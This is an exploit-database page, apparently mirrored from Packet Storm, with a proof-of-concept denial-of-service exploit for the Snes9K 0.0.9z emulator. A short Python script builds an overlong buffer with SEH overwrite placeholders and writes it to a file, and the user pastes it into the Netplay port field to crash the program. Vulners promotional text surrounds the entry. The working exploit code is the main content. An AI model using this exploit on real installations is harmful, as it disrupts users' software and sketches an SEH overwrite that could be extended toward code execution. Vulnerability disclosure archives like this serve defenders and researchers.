Lucene search
K

Snes9K 0.0.9z Denial Of Service

🗓️ 01 Oct 2018 00:00:00Reported by crash_manucootType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 19 Views

Snes9K 0.0.9z Denial of Service (DoS) via Netplay Option

Code
`# Exploit Title: Snes9K 0.0.9z - Denial of Service (PoC)  
# Date: 2018-09-28  
# Exploit Author: crash_manucoot  
# Vendor Homepage: https://sourceforge.net/projects/snes9k/  
# Software Link: https://sourceforge.net/projects/snes9k/files/latest/download  
# Version: 0.0.9z  
# Tested on: Windows 7 Home Premium x86 SPANISH  
# Category: Windows Local Exploit  
# How to use: open the program go to Netplay-Options-paste the contents of open.txt   
# in the Socket Port Number and Boom   
  
buffer = "A" * 260  
nseh = "B" * 4  
seh = "C" * 4  
junk = "D" * 300  
  
evil = buffer + nseh + seh + junk  
  
file = open('open.txt','w+')  
file.write(evil)  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Oct 2018 00:00Current
7.4High risk
Vulners AI Score7.4
19